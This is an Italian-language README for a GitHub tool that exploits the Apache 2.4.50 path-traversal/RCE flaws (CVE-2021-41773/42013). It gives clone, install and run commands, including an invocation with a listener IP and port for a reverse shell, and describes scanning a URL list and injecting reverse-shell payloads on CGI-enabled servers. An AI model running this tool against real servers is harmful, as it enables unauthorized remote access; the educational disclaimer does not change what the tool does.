
Apache-HTTP-Server-2.4.50-RCE Questo strumento è progettato per testare i server Apache per la vulnerabilità CVE-2021-41773 / CVE-2021-42013. È destinato esclusivamente a scopi educativi e deve essere utilizzato in modo responsabile solo su sistemi per i quali si dispone di esplicita autorizzazione.
Questo strumento è progettato per testare i server Apache per la vulnerabilità CVE-2021-41773 / CVE-2021-42013. È pensato solo per scopi educativi e deve essere utilizzato responsabilmente su sistemi per cui si ha esplicita autorizzazione al test.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
il file di testo deve contenere l'url del target
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Controllo versione Apache: Per ogni URL nel file fornito, verifica se il server sta eseguendo Apache versione 2.4.50.
Se il server è vulnerabile: tenta di sfruttare il server inviando payload per attivare attacchi di directory traversal o eseguire codice in remoto. Se CGI è abilitato: tenta di iniettare un payload di reverse shell per ottenere accesso remoto.
Solo per uso educativo: Lo script è inteso per scopi educativi per dimostrare come le vulnerabilità possono essere testate e sfruttate. L'uso di questo script contro target non autorizzati è illegale e non etico.
Scopo della modifica: Aggiunta di ulteriore gestione degli errori e ottimizzazione della logica del payload e RCE e rimozione cve